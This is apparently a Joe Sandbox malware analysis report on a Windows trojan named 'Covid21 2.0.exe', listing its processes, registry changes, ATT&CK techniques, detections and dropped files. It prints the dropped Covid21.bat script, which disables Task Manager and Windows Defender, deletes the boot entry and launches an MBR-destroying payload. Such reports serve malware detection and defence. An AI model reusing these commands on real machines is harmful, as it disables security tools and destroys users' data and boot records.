Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe PayloadMBR.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\covid21\Corona.exe c:\covid21\corona.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exe
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, z.exe.0.drBinary or memory string: Program Manager
Source: Covid21 2.0.exe, z.exe, PayloadMBR.exe, 00000024.00000002.791832292.0000000000401000.00000020.00020000.sdmp, z.exe.0.drBinary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000008.00000002.793742315.00000000037C0000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.793639619.0000000000CB0000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.792750728.0000000000D80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.793392786.0000000001C00000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.792369674.0000000000E90000.00000002.00000001.sdmp, icons.exe, 0000001B.00000002.793032728.0000000001100000.00000002.00000001.sdmp, screenscrew.exe, 0000001E.00000002.793451174.0000000000DC0000.00000002.00000001.sdmp, PayloadMBR.exe, 00000024.00000002.793503258.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progman
Source: Covid21 2.0.exe, 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp, PayloadMBR.exe, 00000024.00000002.791832292.0000000000401000.00000020.00020000.sdmp, PayloadMBR.exe.0.drBinary or memory string: Windows UpdateShell_TrayWnd
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drBinary or memory string: (preempted: they will resume when the current thread finishes)%s CreateWindoweditShell_TrayWndAutoHotkey2RegClass0x%%%s%s%s.fRequires 1/2/3/Slow/Fast The current thread will exit.msRelativeScreenPress OK to continue.wait
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drBinary or memory string: ?IsHungAppWindowIsHungThreadThe maximum number of MsgBoxes has been reached.groupclasspididahk_%s%uProgram Manager
Source: wscript.exe, 00000008.00000002.793742315.00000000037C0000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.793639619.0000000000CB0000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.792750728.0000000000D80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.793392786.0000000001C00000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.792369674.0000000000E90000.00000002.00000001.sdmp, icons.exe, 0000001B.00000002.793032728.0000000001100000.00000002.00000001.sdmp, screenscrew.exe, 0000001E.00000002.793451174.0000000000DC0000.00000002.00000001.sdmp, PayloadMBR.exe, 00000024.00000002.793503258.0000000000E20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004053D4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_0040B068
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_0040B0B4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_004054E0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_00405CCE
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: GetLocaleInfoA,6_2_00405CD0
Source: C:\covid21\Corona.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004050DC
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_0040A9FC
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_0040AA48
Source: C:\covid21\Corona.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_004051E8
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_004059D2
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,12_2_004059D4
Source: C:\covid21\Corona.exeCode function: GetLocaleInfoA,GetACP,12_2_0040BFE8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,13_2_00405070
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_0040A8B4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_0040A900
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,13_2_0040517C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_00405966
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,13_2_00405968
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: GetLocaleInfoA,GetACP,13_2_0040BE14
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: GetLocaleInfoA,18_2_0043DE27
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,30_2_004043C8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetLocaleInfoA,30_2_004082D0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: GetLocaleInfoA,30_2_0040831C
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00409B44 GetLocalTime,6_2_00409B44
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00419AF0 GetComputerNameA,GetUserNameA,_strcat,_strlen,18_2_00419AF0
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00403CD7 GetVersionExA,GetVersionExA,GetVersionExA,0_2_00403CD7
Source: C:\Windows\SysWOW64\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Disables the Windows task manager (taskmgr)
Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
Source: z.exe.0.drBinary or memory string: WIN_XP
Source: z.exe.0.drBinary or memory string: stoppedplay AHK_PlayMeopen "%s" alias AHK_PlayMe%s\All Files (*.*)*.*Text Documents (*.txt)*.txt%s%c%s%cAll Files (*.*)%c*.*%c Select File - %s::{The maximum number of File Dialogs has been reached. The current thread will exit.A Goto/Gosub must not jump into a block that doesn't enclose it.MMMMMMM%02d%03dMSec%dmsSlowSingleLogoff1.0.48.05\AutoHotkey.exeWIN32_WINDOWSWIN32_NTWIN_MEWIN_98WIN_95WIN_NT4WIN_2000WIN_2003WIN_VISTAWIN_XP.DEFAULT\Control Panel\Desktop\ResourceLocaleSYSTEM\CurrentControlSet\Control\Nls\LanguageInstallLanguageSOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirAppDataCommon AppDataSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersDesktopCommon DesktopStart MenuCommon Start MenuProgramsCommon ProgramsStartupCommon StartupPersonalUpArrowSizeWESizeNWSESizeNSSizeNESWSizeAllSizeNoIBeamCrossArrowAppStartingUnknownGetCursorInfoColClickDoubleClickNormalGetLastInputInfo
Source: z.exe.0.drBinary or memory string: WIN_VISTA

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture31System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScripting112Scheduled Task/Job1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
Domain AccountsNative API1Registry Run Keys / Startup Folder1Access Token Manipulation1Scripting112Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture31Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter1Bootkit1Process Injection12Obfuscated Files or Information21NTDSSystem Information Discovery37Distributed Component Object ModelClipboard Data2Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsScheduled Task/Job1Network Logon ScriptScheduled Task/Job1Software Packing21LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder1Masquerading1Cached Domain CredentialsSecurity Software Discovery351VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncVirtualization/Sandbox Evasion15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion15Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronBootkit1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

[Behavior graph: ID 377010, Sample: Covid21 2.0.exe, Start date: 28/03/2021, Architecture: WINDOWS, Score: 84]


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Covid21 2.0.exe | 70% | Virustotal |
Covid21 2.0.exe | 30% | Metadefender |
Covid21 2.0.exe | 75% | ReversingLabs | Win32.Trojan.DiskWriter
Covid21 2.0.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | 100% | Avira | HEUR/AGEN.1133501
C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | 4% | Virustotal |
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | 82% | ReversingLabs | Win32.Trojan.KillMbr
C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe | 13% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe | 6% | Metadefender |
C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe | 48% | ReversingLabs | Win32.Downloader.Convagent
C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe | 36% | Metadefender |
C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe | 62% | ReversingLabs | Win32.PUA.BlurScrn
C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe | 7% | ReversingLabs |
C:\covid21\Corona.exe | 8% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.Covid21 2.0.exe.63145a.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
36.2.PayloadMBR.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
0.0.Covid21 2.0.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.Corona.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
36.0.PayloadMBR.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1133501
13.2.inv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
6.2.CLWCP.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
0.2.Covid21 2.0.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.autohotkey.comCould | 0% | Avira URL Cloud | safe
http://www.rjlsoftware.com( | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.rjlsoftware.com/?screenscrewopenj | screenscrew.exe, 0000001E.00000003.729503063.00000000021D0000.00000004.00000001.sdmp | false | | high
http://www.rjlsoftware.com/?screenscrew | screenscrew.exe | false | | high
http://www.autohotkey.com | z.exe.0.dr | false | | high
http://www.autohotkey.comCould | Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://www.rjlsoftware.com | screenscrew.exe, 0000001E.00000002.792044732.000000000043B000.00000004.00020000.sdmp | false | | high
http://www.rjlsoftware.com( | screenscrew.exe, 0000001E.00000002.793881577.00000000022C0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 377010
Start date: 28.03.2021
Start time: 15:52:23
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 58s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Covid21 2.0.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Detection: MAL
Classification: mal84.rans.evad.winEXE@73/19@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 90% (good quality ratio 87.5%)
  • Quality average: 84.6%
  • Quality standard deviation: 24.6%
HCA Information:
  • Successful, ratio: 53%
  • Number of executed functions: 144
  • Number of non-executed functions: 346
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Sleeps bigger than 120000ms are automatically reduced to 1000ms
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          Time | Type | Description
          15:53:32 | API Interceptor | 1x Sleep call for process: z.exe modified
          15:54:02 | Task Scheduler | Run new task: Windows Update path: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          Match | Associated Sample Name / URL | Detection
          C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe | Covid21 2.0.exe | malicious
          C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe | Covid21 2.0.exe | malicious
          C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe | covid21.exe | malicious
           | HorrorTrojan 2.exe | malicious
           | HorrorTrojan.exe | malicious
           | HorrorTrojan.exe | malicious
           | Fall Guys Cheat.exe | malicious
           | Fall Guys Cheat.exe | malicious
           | freebobux.exe | malicious
          C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe | Covid21 2.0.exe | malicious
           | covid21.exe | malicious

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):517120
                                Entropy (8bit):6.5991952372789155
                                Encrypted:false
                                SSDEEP:12288:kDupRTrjf1nJp2NLtVu4jPau4p+lE3dWq:SExrj1DAt84DaTU4dW
                                MD5:E62EE6F1EFC85CB36D62AB779DB6E4EC
                                SHA1:DA07EC94CF2CB2B430E15BD0C5084996A47EE649
                                SHA-256:13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
                                SHA-512:8142086979EC1CA9675418E94326A40078400AFF8587FC613E17164E034BADD828E9615589E6CB8B9339DA7CDC9BCB8C48E0890C5F288068F4B86FF659670A69
                                Malicious:true
                                Antivirus:
                                • Antivirus: Virustotal, Detection: 4%, Browse
                                • Antivirus: Metadefender, Detection: 8%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: covid21.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan 2.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan.exe, Detection: malicious, Browse
                                • Filename: HorrorTrojan.exe, Detection: malicious, Browse
                                • Filename: Fall Guys Cheat.exe, Detection: malicious, Browse
                                • Filename: Fall Guys Cheat.exe, Detection: malicious, Browse
                                • Filename: freebobux.exe, Detection: malicious, Browse
                                C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):531456
                                Entropy (8bit):7.007155751747995
                                Encrypted:false
                                SSDEEP:12288:bt007p82D5NYQ1bjLXHfNOTliq6G8/Q3Uk+leP4RG3:2qpzvYQ1Tfoi8b3U1kaq
                                MD5:6374CA8AD59246DFED4794FD788D6560
                                SHA1:D54281430AD11272F657DE4E909B4BA7B8561821
                                SHA-256:25B6F4ABC0B8A7A3F3CAE54A2F75810B977C0F5ED20AF98E77BE9449E7135108
                                SHA-512:0434F5C6ECD1A036A59E2F5DE56F0905460D46C31FFF6A7F160F54CFBCB56EA2DA22647D564E53D66C47A789A67D165C59E64D924B0F2CF80FDCD865847A772F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 8%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1444
                                Entropy (8bit):5.183015206655524
                                Encrypted:false
                                SSDEEP:24:YfzzhPV10V1+Vb+OV3q1gvV1Y5U2VVjfA+ifuhwXVCRB3aoSOZcRWm:YRPq+8OZq1gvAU2fTAnfuhwFCRB3ayeP
                                MD5:6B89A7FD6E3D9BDC4658162AAF468558
                                SHA1:F8EF11B2420B95661565B799D86C188BF11BF4A7
                                SHA-256:76986CDDBFEB8FA8738C8CA2665A7F91D19D1E8C6851151FCBA5164E35618DFB
                                SHA-512:F9B3338B65D5CA6CC25B1C36B2C3299D758D5E7AC92E6FD8D0298F945E898C51E548323F86A12983BB375E49404CB6B401F5472BBB580A6675DF57277045EF12
                                Malicious:false
                                Preview: @echo off..echo deleting previous versions of covid21.....rd c:\covid21 /s /q..cscript prompt.vbs..if ERRORLEVEL==1 goto infect..if ERRORLEVEL==0 goto quit....:infect..REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f..Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f..md c:\covid21..copy covid.jpg c:\covid21..clwcp c:\covid21\covid.jpg..reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f..echo do > x.vbs..echo msgbox "Covid-21 is here! Your Windows will get destroyed soon!" >>x.vbs..echo loop >>x.vbs..start x.vbs..bcdedit /delete {current}..copy corona.exe c:\covid21..start /min coronaloop.bat..echo msgbox "corona virus" >y.vbs..timeout 5 /nobreak..start inv.exe..start y.vbs..timeout 5 /nobreak..start z.exe..start y.vbs..timeout 5 /nobreak..start mlt.exe..start y.vbs..timeout 5 /nobr
                                C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):103424
                                Entropy (8bit):6.182089878681113
                                Encrypted:false
                                SSDEEP:3072:wCGPVHzzgd2HPVVf9AebuLFfK9s7I+PnNgDd9:wrak9gor+Pn6
                                MD5:D917AF256A1D20B4EAC477CDB189367B
                                SHA1:6C2FA4648B16B89C4F5664F1C3490EC2022EB5DD
                                SHA-256:E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0
                                SHA-512:FD2CB0FB398A5DDD0A52CF2EFC733C606884AA68EC406BDBDDB3A41B31D6F9C0F0C4837326A9D53B53202792867901899A8CF5024A5E542E8BDCEE615BE0B707
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 82%
                                Joe Sandbox View:
                                • Filename: Covid21 2.0.exe, Detection: malicious, Browse
                                • Filename: covid21.exe, Detection: malicious, Browse
                                C:\Users\user\AppData\Local\Temp\2526.tmp\coronaloop.bat
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):48
                                Entropy (8bit):4.292962241741917
                                Encrypted:false
                                SSDEEP:3:jTDVJWoHgKTHd6vJcn:/etmdEJcn
                                MD5:08437E731C7B135B3779B004C7863E5F
                                SHA1:24CE5D4075FDC5AFEC6CB87CACFC7B54DEADC3EC
                                SHA-256:043B49FBBE070997844A2C4467596553261BFB6EA79AC3C50FABD42146EEA924
                                SHA-512:6006014B10F400B6975B391BE64E07E78FE5A3818CD39A0A8F9349C4CFF595134FB5217BEB5205E04EAB86473C4FA0F6701B657D76C144540AA468D2D382C8A1
                                Malicious:false
                                Preview: echo off..cls..:0..c:\covid21\corona.exe..goto 0
                                C:\Users\user\AppData\Local\Temp\2526.tmp\covid.jpg
                                Process:C:\Users\user\Desktop\Covid21 2.0.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1080, frames 3
                                Category:dropped
                                Size (bytes):170445
                                Entropy (8bit):7.987389688426996
                                Encrypted:false
                                SSDEEP:3072:mTwQIE+8Tj6wFrxGxGtSdWyCmI5KkeD8vcWtTH3Mi/gc+P9IP7HwKFKBlrF:qOE+o6hgcYLmI5+8k+TH3Mi/J+Pi7Hwn
                                MD5:94AD752ABC09644D0B91A07022ECB000
                                SHA1:7EE97DC56E62E7B2D86EE892E7CF70673252242F
